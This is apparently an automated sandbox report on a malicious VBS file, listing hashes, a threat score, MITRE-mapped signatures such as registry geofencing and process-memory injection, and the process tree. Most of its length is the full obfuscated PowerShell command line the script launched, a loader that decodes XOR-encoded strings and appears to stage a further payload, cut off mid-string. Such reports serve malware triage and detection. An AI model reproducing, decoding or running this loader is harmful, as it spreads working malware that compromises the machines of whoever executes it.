03478e943747cf8baec9db5d77c280077e2250693a72fbae9d14e10ddd459947

General

Target

28288277-MSC038837.vbs
Size

399KB
MD5

4c2813e6b5b012c84caea68e91051115
SHA1

56e77ee23bd42f375b7558774b055173c5b78da2
SHA256

03478e943747cf8baec9db5d77c280077e2250693a72fbae9d14e10ddd459947
SHA512

22c0b09207cb6d0f93765ca63fbf238d8d924b01ea5be45322e12b6beddf7672d110abdb4b2cd26192b1b4b7df4dce5557b679a8a711802aa2e01e97f9bb0061
SSDEEP

6144:z698S8/DcGaT3qRXbdjohlI/ss5vzBbEpXUrnY3FXPfkhSkoOACCXL:z6CS8/1aT6hdUhlcVBbEpXUryJPfkUrX

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4232 powershell.exe
4232 powershell.exe
2304 powershell.exe
2304 powershell.exe
2680 powershell.exe
2680 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4232 powershell.exe
Token: SeDebugPrivilege 2304 powershell.exe
Token: SeDebugPrivilege 2680 powershell.exe

pid	process
4232	powershell.exe
4232	powershell.exe
2304	powershell.exe
2304	powershell.exe
2680	powershell.exe
2680	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4232	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	2680	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2836 wrote to memory of 4232	2836	WScript.exe	powershell.exe
PID 2836 wrote to memory of 4232	2836	WScript.exe	powershell.exe
PID 4232 wrote to memory of 2304	4232	powershell.exe	powershell.exe
PID 4232 wrote to memory of 2304	4232	powershell.exe	powershell.exe
PID 4232 wrote to memory of 2304	4232	powershell.exe	powershell.exe
PID 2304 wrote to memory of 2680	2304	powershell.exe	powershell.exe
PID 2304 wrote to memory of 2680	2304	powershell.exe	powershell.exe
PID 2304 wrote to memory of 2680	2304	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\28288277-MSC038837.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Katakombens = """ElFReuBrnSlcbatCriUnoSunMi BeHPhTLuBSu Ek{Di Gh Mo Co RopOnaSarSiaPomAb(Hd[ZiSadtJurBaiDonMigIn]Vi`$DrHMaSSk)Po;Ta Ef ar Ch Pe`$StBPeyretBoeWhsBi Ge=Er SaNreeAcwSk-MaOPrbTrjReeincSptFe TabBrySatVaeFl[Co]Me Be(Li`$OkHLoSAv.CaLMieTinMogSotUfhHa De/Mo no2No)Sp;ak Hi No al BrFOvoStrOp(Go`$RiiTv=Ca0Ko;Tr he`$Seipe Gr-anlAmtRa Ta`$LuHHoSTe.UdLeseNanStgBatSuhun;Ef Co`$AciKo+re=Ve2Va)un{ek Om Bi Es Be Ka Ex Vg Bl`$TuBSiyRytheeDrsVi[Fo`$PaiRe/Se2Mi]Am Tr=Uf Sc[MicProNsnalvudeBarTetPu]Tr:Sn:ShTApoArBreyKatDieKn(Ad`$NoHReSUn.EkSLeuOvbAksTetkorMoiNinAdgTy(Ko`$ReiCo,Oa Co2St)Be,St Pl1Fj6Re)Fo;Tu Bi Ap`$FoBReyJotHoeStsRh[St`$tviEv/Af2ti]Be Su=Ha Gd(Le`$CaBNeyGatGeeEnsNe[Fl`$spiCl/Un2St]Ba Ha-HabSixSkoFarCa Sk1El2Tr3Ch)Ba;Wr Fo Di Ov Ma}Gy St[soSTutCirRoiTinTigOr]St[FoSFryrhsIgtSaeUdmDi.BmTLaeAuxDetKa.AkETrnFrcUnoCadiniDonPlgAd]Ac:Ve:tyASuSSoCStIIdISt.ChGRieSutUlSSetDurPoiBjnGugFo(Pl`$UnbCayAutVieAlsTr)En;Sk}Ld`$SvCVizUniBogseaDonEiyAa0La=osHSpTCeBBo Ve'Fo2Un8No0So2Bl0Os8Ro0DaFAn1DyEsu1fo6Op5Un5Bl1HyFRa1Um7St1se7Pe'Et;Ac`$StCSpzPiiKugSoaPinOpyTa1Op=PaHDiTJoBTa At'Va3Pe6Sc1fr2al1Fo8Ac0Ge9Bu1Io4Un0Ch8Sl1Tr4Gr1AdDTr0SkFGl5Fn5be2GeCpr1Fi2Sa1ob5Fd4Ok8Na4Ha9Si5Sl5Af2SeEHy1Sp5Se0Ec8Si1ApAUn1paDRe1KiESo3Ga5as1PrAPo0UnFHj1Ot2Fl0KaDPl1FaEFl3St6Is1DeEOp0AlFBa1to3Sl1Fj4Mo1SjFUn0Sa8Fd'mv;ma`$SoCBozFoiWagInaWhnSpySt2In=PaHCaTZoBMa In'Ac3BeCxa1LaEFl0RaFCe2ReBHo0Ri9En1Ma4Ga1Da8Em3FiAUn1SkFGa1suFRo0De9Gn1AfEUn0Fl8Li0Al8ns'An;Po`$TiCDezSliAdgToaOvnKlySi3dr=DrHVoTStBMa Ab'Ro2Ek8Re0Sv2As0Re8Nu0srFFa1MeEEu1De6Fe5ch5Bu2Bl9Sp0SaEUn1da5Fs0ReFAd1Tr2Un1Fo6Co1OfEPi5kl5Dr3No2Ma1Ko5Kr0CoFov1OpEFu0Sp9ki1Gu4pa0InBTo2Lo8Ta1KrESe0Fr9Ph0prDDu1No2Sv1Zo8Kl1CyEVa0Bl8fo5Un5Ef3al3Gr1brASt1Eu5Af1ImFNe1Di7st1luESm2ta9Sr1PrEpr1LgDDa'Ly;lo`$JuCSuzAdiTugViaBenPiyPr4Ov=RiHBlTFeBUn Te'An0Hy8Cu0SpFMe0La9De1Eu2Br1In5He1DrCBu'Ou;Cl`$LoCCozEmiCagBeaRenKyyVa5Hy=ViHVeTklBPh el'Ud3TuCOm1AfELa0meFUd3Fe6Ke1My4Ka1StFSi0unEFe1Pj7St1BlEKo3Im3Ba1CoADu1Po5Sy1ShFFa1Am7fo1InEAn'Fl;Fr`$OvCHizDmiSlgAnaAdnSuySk6Ha=RaHGrTVkBfr Bi'Ta2Ou9Ba2FiFma2Kr8Pa0GaBAf1FlEIc1Pi8Fi1Bi2sv1MeAIn1Pa7Vi3tj5So1SeATu1Po6Tb1DaEIt5Ca7Ba5SkBsc3Se3mo1Se2Ma1reFSk1JaEDo3Pr9ha0Rh2Ve2Fl8Ci1an2ba1FaCMy5La7Do5UnBFr2FaBTr0DeESo1In9Sy1Cl7In1Sk2By1Di8Fo'de;Ca`$EfCImzDoiUngspaBanReyCa7Ca=DiHKuTEnBca Ka'Br2Tr9Dr0MaESy1Ho5Dr0MeFFo1Ba2Sa1De6xa1LiEPa5Fl7Se5PrBLi3Sv6fo1PrATe1Co5Ru1FaADr1EfCIn1BeESp1BiFHe'Mo;In`$AlCWizKhiLegUdaSknMayAn8be=TrHInTchBLn Sy'co2No9Hu1FoEsc1KaDSp1Pa7Ar1MeESk1en8Ad0CoFDe1PeESb1InFTe3TuFSu1PaECh1In7Te1EpEfo1TwCVi1TiAPl0RiFNo1fiEAf'Sk;Am`$noCArzDoiSegTraInnSayNa9Ir=HiHRhTAuBCr Se'Ou3Be2Ov1No5Ef3Su6Un1TjEAn1Fr6To1Mu4Pe0As9Do0Mi2Fr3Sh6Lr1Sh4Si1ExFFr0TeEDe1Tr7Ge1FoENy'Se;fa`$AnUWorSaaHonSviarfVieUnrGeoSeuTrsTi0Ti=ChHSuTPoBFj Ra'Br3En6Ar0Vi2sy3GrFNe1DeEGl1Ha7Me1TrEAu1baCSu1MaAPe0NeFUo1SkEHo2MoFCo0Sp2Pr0BeBAq1CoEVa'Ve;Re`$ScUGrrYoaInnpliArfUneIsrLeoUnuStsHy1In=ReHAnTViBrh Bu'ga3tr8Ta1Se7St1ThADe0Ge8Ou0Ra8Aa5Re7Mr5OrBLi2vaBJo0GeEMa1Be9Re1En7Ed1Ba2mo1Op8ba5St7Sc5CrBEx2Co8pr1CiEUp1DeAVi1sa7Bu1skESi1NuFSu5Fl7Ha5DrBTa3taAAn1Ci5Ra0Au8st1Ro2Tr3Ha8Om1Ma7Ti1SuASt0Ud8Jo0So8Ub5In7Sc5PuBOb3moADe0YaEHo0CaFOv1In4Fa3Bo8Bl1la7Be1HeAKo0Is8Sk0Be8Ri'Fe;Hr`$BeUParBraVanneiSlfCaeSurSpoUnuFlsIn2Fo=GaHOzTNoBAu Fo'Dr3Af2Tr1Sd5Ha0SkDFi1Fl4an1Ou0Co1FrEbe'An;Bl`$PaUirrInaSlnVaiDifspeNarJdoQuuCusSo3Sp=OmHAxTSaBWa St'Ca2buBFo0TuEPe1Re9Ha1St7Pr1Vl2Jo1Su8Cr5un7Pi5PeBBe3Te3Sa1As2Po1SbFIn1GeEBr3Mi9Re0Tr2Bu2Gl8Re1Pe2Sm1PhCSh5Ph7Ma5DeBDr3fe5Ka1CuEGa0KvCEr2Pl8Un1Re7Ly1Al4Ja0SlFCu5Tr7Io5SeBAl2NaDBe1Si2Ga0Un9Ek0PuFRu0KoEud1doAIn1St7No'Hr;Em`$fiUOvrCoaEnnSviSafFaeSurAkoSauSosFr4Po=FlHJeTToBCa La'Ni2SuDPr1Fy2St0Mi9Ba0NoFDe0DaEcr1gaAIs1An7St3PaAUn1Fo7Ta1De7Ke1As4Tr1Re8Dr'El;Su`$InUFrrTeaprnPoiFofPueAdrBioMiufasSo5Pu=NaHCeTOuBGl Ui'de1Om5Pr0foFAf1orFNy1Mo7Co1So7Fl'Be;ud`$OpUSarouaConAciPafEmeSvrUnoCouGlsAf6An=PaHTrTDoBFu Ug'Ka3Po5Se0LrFed2ReBSr0Ov9Ge1Fa4Tr0FuFVa1FoELi1Co8Sh0VeFRd2AmDQu1Yd2Fo0Fu9Sv0ScFLe0koEte1CaAVo1Li7Sg3or6Ec1PrEFo1Wh6To1Ki4Ro0Un9Sl0to2Bo'Lo;Un`$SpUSorBraEknsciDafIneParUdoAtuCosTy7Ko=moHCoTMiBUn Af'De3fo2In3QuEst2Ud3Lo'De;ch`$SaUAmrOpaSanSpiUnfLieGerIroReuResIm8Ma=SeHFjTBaBLo Ji'Co2se7Re'Ko;KuSFreMitPl-KoAnolBliOnaNosTy He-FrnUnaAnmAgeLu NaUFirFiaTinSkiTafNeemerInoPruStsGe9Fo Ud-GrvfoamolSeuOpeBa Ta`$UlUStrSeaPrnGliOmfsyeParEmoDuuUdsGr7To;SofTrumenGrcsptFliDuoTanCa SkfAbkMopPa Di{BhPAsaCorSoaTtmAs na(Go`$LavNe_AdmVa,Rv Su`$vevNo_UnpFi)Au Pi Ok Un Fa Hj;Ga`$SedFarCysFraValgugMa0Hu En=GuHInTUnBOb La'Av5LaFSt0LuDPs0StEEk1Gn5In1Kl6St5wiBPo4id6ra5BiBNo5Tr3Ps2Tr0No3BiACh0AmBSp0PrBdi3FoFFa1Ti4Th1Me6Tr1suASh1He2De1br5Sp2Id6Ag4Ni1Fe4Cr1Pl3Pa8Di0SbEBa0Ps9Na0Me9Co1waETr1Ae5Pr0BlFKo3PoFKy1un4Pa1Sk6Un1arAAt1Ho2sy1Sa5St5He5Pu3DiCNo1GrEBo0MoFSo3MaAGr0Di8Ov0Su8To1FoETr1Pi6Ki1Re9En1Hi7Ro1Dv2Ti1KoETy0Ud8Id5Im3Wa5Ca2Au5NgBSt0Ad7Re5RuBEx2SkCMe1Pr3Co1SeEKl0Sn9Fe1FyEIn5Ha6Gl3Sk4De1Jo9Ud1Bo1In1BuEIm1Fr8Ko0LaFBa5PiBAc0Hi0Er5RuBSa5waFCo2Fl4Ec5Fl5Fi3baCTr1da7Sv1Za4Ci1sa9Fr1OvASi1Ca7Pl3PhARe0Td8Te0He8El1ReEWo1Il6Ta1De9Fa1Si7af0Cr2af3Ry8Es1LiAKe1Ha8Ps1Ir3Fl1StEAl5soBBa5Ta6Eu3MiAFl1Pa5Re1ImFOv5GrBSi5SpFKu2Te4Fr5Ra5Bi3Af7Un1Bo4No1No8Hj1MoAVe0suFBy1ta2Co1To4Ch1es5te5Sc5sk2Ra8Fl0DeBFa1Ta7St1De2En0FoFFo5rh3Ea5UmFCo2KyEKa0Pr9Ko1SaABe1Tr5Re1So2Sp1DuDLn1PeENo0Ma9Ba1Ex4Il0JuEEf0Af8Kv4Wa3Ku5by2Im2Le0ud5Im6ma4UlATi2Fr6Ka5Va5Af3StEDu0CaAFi0SkEOb1saAMu1Li7Di0Al8Pa5Co3Bi5BoFBa3Pr8Am0Sn1Op1An2Se1MaCaf1SlAVa1Lm5Vo0Ho2In4BaBMe5Ty2Af5PaBAk0pe6Sa5No2Ne5Fa5An3FoCha1ReEFu0AsFHm2RoFGr0Pa2Me0SnBFr1MiEne5Sm3Sv5NoFfe3Le8Sl0Uf1An1In2Pl1SeCGa1TrAFr1Aa5Be0Be2In4InAjo5ch2Ca'Ab;ViUFerFlaRenFeiBefvieUnrSkoPouMosBl9An Sk`$ImdNarSlsPlaFrlAngVe0Hi;wi`$LodVarTrsTraColsmgTr5Sp Ed=Te UnHDiTslBCl Mo'Tr5FeFpo0KnDFl1VaAHo0An9Ur2Tr4Sp1ReCIl0FlBMa1IlASt5SuBPy4No6Lo5TiBEd5DiFNo0XeDFo0stEBi1gr5La1Pr6Ce5Ko5ak3MeCRe1DiERa0TiFRa3An6Sa1PrEMo0VeFMe1Os3St1Go4St1ViFKo5Cu3Ac5PiFDo3Uf8Un0Ma1Vi1Pr2Ey1BlCDi1SkAUd1Ka5Ke0Si2pr4Ve9lo5Co7pa5WoBGu2Hj0Ny2CoFHu0Ap2Es0TaBGa1CuEUt2Pl0Wr2Gi6Ba2Re6fo5VaBGe3BeBTr5Ek3Cl5PrFPr3ja8Is0Tr1Co1He2To1PhCKo1KuASe1Ud5Sy0Li2Ps4Di8Re5Tu7Fe5PoBOr5OmFSp3No8Re0Tr1Mu1No2Qu1AaCSt1LyAUd1dg5Le0Ri2Or4NoFSp5No2Tr5Re2Ko'Pa;udUBrrUnaJnnPeiUnfUneWorEvoTeuPesIn9Ek Fe`$WidJorAusPoaMilbrgFo5Tr;la`$BedPirSksMaaNulSpgUn1Pr Ma=He TyHStTDeBCu Sy'In0ba9Ex1SyECy0PlFdi0PiETa0Ri9Be1Ad5ho5SlBPl5LaFTr0ReDCa1KnANe0Or9Da2ch4Mu1GrCFo0BjBUd1CoAak5No5Ix3Co2Sa1Ve5Po0HoDSl1Ar4Ma1Se0In1MaEIn5He3Ap5LuFSh1Ma5Me0VaERa1la7Be1Ju7Ac5Sl7Fo5OvBce3StBDe5Ov3Le2Sd0Cu2Hu8Ve0La2sy0St8Va0OpFLo1PrETr1Re6Br5Sk5Pl2El9Ud0TrEPa1Di5Ho0IsFAr1Gu2re1Bu6Vo1suECa5Lu5Eg3Gl2Fo1Vi5Mu0LiFPi1RaEFe0Hi9St1Ba4Ky0DiBMe2Kr8Bi1AlEDe0Et9an0EfDGo1Ma2Fi1Eu8Su1DeEbe0Ov8Mo5Ty5Sw3Cu3Fo1DaAMi1Pr5Ko1FoFOp1su7ho1ToEKa2Un9In1AdEBr1auDPo2Da6Lt5pa3tv3No5Tr1UnEre0CiCAl5Ar6Fo3Ex4me1Ec9sy1Pa1Pr1LaESl1Ov8St0ChFEx5SuBPa2Ku8Pl0St2Di0In8St0MoFSq1ArESp1Dj6Al5Ve5Om2Pu9Tr0PeEIn1in5tr0BaFmi1Sc2La1Ch6so1ReECo5Mo5Ne3St2Ca1Bi5Ga0WaFDa1ZiECh0Wi9Da1Un4Et0StBTs2Pu8St1SaECo0Se9En0KrDMa1Lo2Th1Di8No1arEDi0Af8Cy5Ri5Ba3Mo3Ka1chADe1Af5St1ClFfe1Fl7om1SaEPo2Sv9Am1AfEOs1MaDSt5Ke3La5Sp3Mi3Ta5Ex1skEVe0gaCFa5kd6Ga3bl4Dr1St9Mi1Ca1Me1StEGe1Ca8so0SnFgl5BrBSw3Ha2Go1In5To0KaFKo2PaBRe0GrFJu0Ka9Ov5Ba2Sk5Em7Lr5MiBDe5De3Ca5miFSa0KeDKa0FeESl1Ti5La1Li6Ar5Sa5Va3LiCEj1RiEru0FrFIn3Wa6Ce1TiEMa0GeFSu1Ce3Sl1Gr4un1SyFMi5Ov3Sc5SiFFo3af8Vi0Di1To1gu2Al1RiCSo1HjARr1Ra5Fn0In2tr4ThEVe5de2Sp5Su2Su5Br5Hy3Ol2Af1Un5In0frDGe1Po4Ca1Fe0Su1KoESk5Dy3Ov5WiFSo1Dd5Ph0BoEFr1Re7An1Ov7Se5Ha7An5auBLf3VrBSi5Ko3Tu5heFWe0MeDLr2Ma4Ko1pr6he5Wi2du5To2In5Pa2Ep5Do2Pr5Pa7In5SeBRe5EmFGe0UmDPa2Su4Ca0EkBvi5Pl2vi5St2od'Af;PlUInrudaUfnFoiTrfLoeclrBeoMauHasAq9Du Un`$QudberBrsTraInlFrgCe1Li;Ne}PhfJuuFdnPrcWotEsiRaoDindr TeGSuDBeTSn Ot{SpPSyaFarChaBomCa Kr(Ru[LsPDaaElrShaEkmKleLitpueNorSt(HnPChoKusariFotshiSkoOunIn Hv=Du Gr0Sc,fr BeMLaaTenTudReacitSooBerukyGa Ri=Op Ve`$ReTNorPruImePa)Sk]Be Un[AnTEnyAfpAreAe[Mo]un]La Ko`$PavViaPtrSk_DepFeaUnrKoaBomspeHatUkeurrSusHy,An[MePMiaOnrBaaFlmMeeMotKoeAsrTo(OvPAvoorsSpiqutitiPdoKvnDe Ma=St Un1Un)Ud]Se Sk[MaTFayBepSkeDi]ax Ed`$NovSerJetOv Do=De At[PrVReoIniTodDa]Sk)Re;Va`$irdForBysSpaLolStgFu2Av Ca=Ge FiHVrTSoBRe Ud'sk5KiFAl2FrDHn2SpFPh3Ge9Th5JoBDr4Be6Un5msBpr2Am0De3CaAar0asBFu0ReBGi3SpFIn1No4Be1Tr6La1AdABe1Sk2Fi1Fr5Gu2Ca6Un4Al1En4Tu1Fo3Lo8Pr0afEKa0De9Co0dy9Su1RaEBl1Fi5Di0DaFSo3AuFko1Di4bl1Cl6Lb1LiADi1bj2Ov1Tr5Re5sy5Ax3KuFDy1SpEDe1UnDAn1Da2St1Af5Ge1TiEEp3MiFPs0so2Po1Im5Pa1GrAGa1Em6re1Po2Ty1Pa8Je3ReAPo0Te8St0Pr8ca1SpEUd1Ex6Br1De9No1De7Qu0Re2Ov5Na3Ty5Ny3Fa3Ri5Je1shEFl0AmCGa5Gy6Hs3Ga4Co1ba9Sp1Ne1Cr1LoEAg1Te8An0ReFKo5LaBVe2Mu8Sa0Pr2Cy0He8St0ToFKl1FaEFe1Vi6Be5St5Cu2rn9Op1BoEBl1SkDco1Ro7Uv1KeEDe1Fy8Un0DiFDe1Tr2su1be4Li1Bl5Fo5Re5Ek3GaAKe0ph8La0Ca8Fr1MiEIs1Ne6Le1Ne9Sm1Re7Le0Ba2Tr3Pa5Ad1PsARo1Cu6St1SkEDi5Mn3Sk5SvFTr3Pl8Ga0Fo1Ka1Si2Ge1LaCDe1PlAAv1Re5Pr0Es2Af4Co3Pa5Pl2ha5So2Ke5Li7Ll5EkBSl2Re0Ta2Be8Hi0in2Hu0Oi8Lu0PlFSe1VsERi1Je6Be5Un5re2ak9Ko1LiECh1KlDEx1de7Rv1CrEVe1Ci8Si0FiFsu1Fa2Rh1Be4Ti1Ov5Ou5Sn5Sa3coEKu1Fe6gy1Tw2Pr0PrFFa5In5Al3DeAGr0Re8Ko0Mo8Re1haESa1Sa6As1Mi9Ch1Sn7Op0No2pt3Uk9Me0CuEPl1Co2Un1Ac7Un1SlFKr1AnEWh0Pu9In3SiAFl1La8Dr1Ti8Tr1UnEFl0Do8Sp0Fr8St2Pl6Kn4Kr1On4Ex1Ps2Ha9Dr0SeEFo1Ki5Re5Fa2an5No5Ko3BiFSa1PaEPe1LeDMo1Sw2Br1Ho5Re1MiEPr3MoFBo0Si2Fo1Au5Sp1FrAGa1Vi6Pa1An2An1Vi8Gi3Sk6Ba1Tr4st1PlFAd0BeEVa1Ra7Am1AfELs5Tr3Ba5UnFPh3Gr8Hj0Ne1Ce1El2Un1KiCSp1GrANo1pi5Pi0Ke2Be4Vi2Vi5Su7Gl5ToBDo5GaFpr1kaDIl1SmAan1Br7Ko0Ek8Sa1luEKi5Ve2Re5Di5Ci3ApFin1OpEAn1IdDKl1Be2Ka1So5Op1EnEBr2HoFAf0Ba2Mi0KvBPr1FrESt5Gr3Pr5UnFUd2paEUn0sk9Ov1iaAev1pa5Bo1Gh2Di1ChDBy1HyENo0Ba9Re1Pr4La0ChETi0Fi8Au4SlBTr5St7Ba5DaBEp5EkFun2ReEOr0Ya9Di1GuASa1Sm5Mu1Ex2Ud1AcDHa1TaEAs0Ka9Ka1Le4Gu0UdEPl0Di8Br4DeADr5ta7fa5SnBOp2At0Fo2Tj8Fo0Di2Mo0Tr8Tr0UnFBa1AeEam1Va6Af5Ov5Sy3At6In0raEMa1ov7Ha0HaFSk1Ne2Sp1tr8Re1AdAAr0Or8Ta0PrFwi3BrFEs1TrEYa1Co7Fr1SqEDr1SiCFa1OaAAf0SlFKn1beEFa2Tb6Ti5Kr2Fu'He;UdUForGlaTenBliScfSpeBurBloHauansGi9Ou Pr`$SkdDmrIdsSpaShlDugAb2En;Fs`$StdHarNasGlaKelTagMi3Fo sp=Dg ReHOpTDoBUl Af'Ne5ImFTe2UnDun2ChFFi3Wr9Ti5Ko5Fy3SuFDy1LeEHa1koDDi1Fa2Pr1Ak5ho1SaETu3Kn8Te1Bl4Ti1In5Fl0Si8Ja0NaFAs0Ch9Ab0KuEFl1Ud8Pr0UnFRe1Ta4Et0Op9Ko5Gu3Ro5PeFMo3Ud8ob0Py1Ve1si2Ka1EfCFa1NoAma1Ga5Dr0Pr2Ek4SpDVe5Pr7Da5LiBFe2Da0Ac2De8Mi0Un2So0Sk8Br0RaFSa1ReETe1Op6Si5Si5Sa2Di9En1MeETj1NoDBe1Ka7Pa1CaERa1Qu8Lu0FiFRa1Si2Bi1By4ma1Fo5Gh5Pa5Um3Ad8Br1CuAPa1Ma7Un1Le7gu1Re2Un1Ce5Ke1RoCBa3Se8Fr1Py4Sn1Co5Po0ArDUd1VrEHa1Sk5St0InFPa1An2St1In4Pa1Eq5Sn0Su8no2kr6al4Po1St4An1So2Ca8pe0RoFRo1ReAko1El5Ud1reFOs1EmAUn0gu9Sp1UfFFa5Fr7Re5leBMe5VaFGo0TrDSc1OpAUn0Su9Br2Ko4Sp0TeBfu1ArABl0Di9Fl1AnAAu1Se6La1InEMo0unFMe1krEEp0ud9Gl0Un8Ba5De2Fl5Mi5Ju2Sc8Ps1SaETr0DiFIv3Vi2Le1ag6mu0LyBAd1Su7Ti1SuECa1Ko6As1JoEKa1Wh5Re0SiFme1ChABa0CoFTe1St2He1Be4Am1No5Se3InDBi1Ph7Pr1ByAGr1ReCmi0Tr8Pu5Ch3Sk5BoFMa3Pe8Fo0St1Me1Di2En1tuCto1MaACi1So5Te0ud2Pr4LaCHo5Ek2La'Pe;UnUMirSiaBinStiakfRueCorNioPhuDasTr9Bo Di`$FodForbasAbaJulSagSa3Di;Sp`$ledSirCosQuaPalHjgDe4Si Do=Lo DyHskTElBGe Sm'Op5MoFTh2KnDAd2AsFKe3Lu9Cu5Ka5Me3OvFMa1VeEGl1CoDea1Ra2fe1Ba5af1AcEHa3Xi6Mi1FrEud0SkFre1so3pl1Ma4Sn1vaFOp5An3Re5DiFRa2GeESt0Ep9Sn1MoAUn1Vo5ef1Ov2Un1inDBi1TrETe0Aq9Bu1De4ho0BaEKa0Pl8Be4Fo9Mi5Ma7Un5CoBDa5NoFVe2HeEPy0lo9Sa1SaAHe1Mu5Pl1Af2yo1PaDMi1CoEDe0Ar9Ko1Be4in0ReEIn0be8Sm4Ma8pr5An7Sa5OpBSi5SjFMi0FaDPe0Am9Hu0NoFOu5To7Co5StBLi5BrFAf0BrDSa1SaASt0Ca9Up2Ch4Ud0KiBDe1MaALi0Fj9Fr1VaAPi1Tr6Kr1CeESl0ArFMi1puEMe0Co9Id0De8Sh5Sk2Di5Ap5Mi2Fu8Or1CaECo0AnFCa3Af2Pu1Co6Co0KeBKo1Di7Pe1GeEHo1Fo6Lu1SlEBe1Ek5Ha0MaFUn1StASk0FiFTr1Ov2Re1Da4Re1Ju5My3ScDNa1Vi7Si1SyABi1StCLi0ho8al5st3St5StFBe3Ti8Li0Do1Da1St2Ir1SvCKe1TvASt1Sw5Ba0Fo2Py4UnCOp5Du2Su'Ya;fuUVirDsaStnSmiThfmoeforTaoBiuSesSh9Fo Ri`$GrdSurvesSaaPalofgIn4Sh;Su`$RedBurBrsAraRelTegBo5Ge So=Se JaHCoTNoBKu Ma'Fr0Ga9No1InEDl0NiFti0SuEMo0Go9Af1Re5Un5UnBSl5EmFHa2StDSv2DoFSm3Sc9no5St5Ek3Fi8To0Ga9Fa1ClEDi1OpAPo0StFDe1InEOb2SeFEn0Fa2wh0YeBre1PiESl5Pr3Ma5Hy2Ba'Gr;LeUPorNoaGanSkiDifRoesarKooRduEtsFa9Re Fo`$AmdMirMesspaAtlVagSu5Sp ko Sa Fl;Pr}Co`$AmkInkSl Th=An InHKiTChBli Bu'Di1Dr0Br1AnEBe0Ep9Na1ka5Fo1EnERe1Re7Bl4do8Fr4La9Ar'bu;By`$RedLirInsTiaEnlBogSa6La Pl=vi NoHDiTPnBBy Vo'As5HaFRa0GaDCo1SpAFo0il9St2Br4Un0maDSt1EnAPa5StBIn4po6Ad5FuBCa2Bi0Fo2Sp8Fr0Re2Me0Fe8Sa0TuFDi1VaEsk1Ak6Re5Un5Im2Ra9Sk0GiEDe1Ro5Gr0HeFIn1Ha2Ce1Im6Fl1ydESt5Ha5Fr3Re2Qu1Sp5Un0MaFPl1BrEVe0Vg9De1Pu4Co0GeBBa2Fa8To1EkEbu0Sk9Mi0PsDSk1in2bj1Hd8fo1BaERe0Be8ni5Sc5Im3St6Kv1PaAMi0ps9Ue0Sv8Ra1Ka3Bl1MeAef1Su7Id2no6Zo4Cl1Co4Co1No3AnCPt1RaEAf0GiFCu3reFHe1PrERa1Af7Pr1DeEKa1LeCKo1SkAKi0heFKu1DoELi3KoDKl1ne4Du0Or9Fo3StDDi0ScEBi1At5Ha1Pe8Pi0GiFUn1Li2No1Ma4Ov1Fi5Me2KnBab1En4Ba1Un2Le1He5sp0DeFHa1VaEPl0Rd9Ca5Co3Bi5Re3Sy1CoDNo1Kv0Te0HeBHa5MaBEu5BaFLo1Ou0St1Fa0Sa5kaBFi5boFPi2GrEFo0Un9De1DiACh1Sy5In1Wh2ve1GeDPi1enEDi0Ga9Tr1Co4La0BiECu0Ph8Bl4ReFOp5An2Ub5Mu7Sa5siBPs5Sk3Ma3EdCTh3UiFRe2UdFmi5LoBSo3VaBMa5In3Sp2Co0Sn3Sv2jn1Pr5De0SlFSh2LiBKa0DeFPa0Na9Ba2Kr6Pr5Me7Im5FoBBu2At0Pe2FoEou3In2ho1By5Pe0SlFFa4Sk8or4Ha9Tr2sa6Pr5Vi7Ar5AmBUp2At0Ha2DeEGa3Fi2Hu1Va5Ud0KaFwi4Ho8Tj4Fo9Pe2Te6Ge5Ce7Fl5phBSs2Fr0Cr2FiEup3Su2Al1Fr5Tr0OvFSv4so8Ej4Fr9Un2Fr6Ba5Ba2In5SoBMo5Ns3De2Af0Ma3Sl2St1Ku5Al0CoFGa2OvBUk0InFBo0Pr9Ra2Ni6Mi5Ed2Bu5Gi2Pe5En2Bo'Es;NoUEarDeaUnnDeiPrfCoeInrUnoKnuLesLg9Su Pe`$sadInrPisraaMilsigDi6Te;in`$OcvAraSursu_HenBrtUt Di=Ka NafFoktjpPr Sk`$OmUAvrBaaKanPoiBlfFdeSprCooMiuEnsru5Ks Be`$ApUWorFuaCanMeibafSaeElrPuoPyuHosNo6Pr;Mo`$FodstrSpsScaPalRogOp7Op ki=St SeHSmTTiBUn Ed'De5FiFLo3Se3si0Pr2Lu0El9Gl1PiASt1an8Un1Un2Op1BeDPe1Ap4Pr0ne9Sk1Sy6Te4Di8Po5FlBre4vo6Pa5DiBRe5frFMa0OvDFa1UnAin0No9Kn2Mi4Ma0PrDsy1WoATo5Ge5Rs3Wa2Hy1Tr5Jo0MaDSh1Su4Is1Re0Em1HyETr5Fr3Me2In0An3Eg2Ra1Pi5Oz0QuFRu2OvBUd0FlFDr0Et9Pr2Wa6Tw4Ky1Il4me1tr2Ca1Pa1ClERe0Ko9Ad1Do4We5Pr7re5baBRi4he8Se4BrECa4La3Te5Ka7Tr5SpBAm4TrBPa0Ca3Fr4zo8Gl4AbBti4PrBFr4seBHe5Sq7Me5SlBVa4UnBDa0Ko3fi4enFDa4FaBRa5To2Ur'Al;KoUKirFeaRenIniPefFreAbrSvoPluPosSa9Eq Ca`$PadRerMisFraDilxpgEx7Fr;Il`$LydHarSesBoaLulsngTa8Ts Gr=Om PlHSkTInBPo 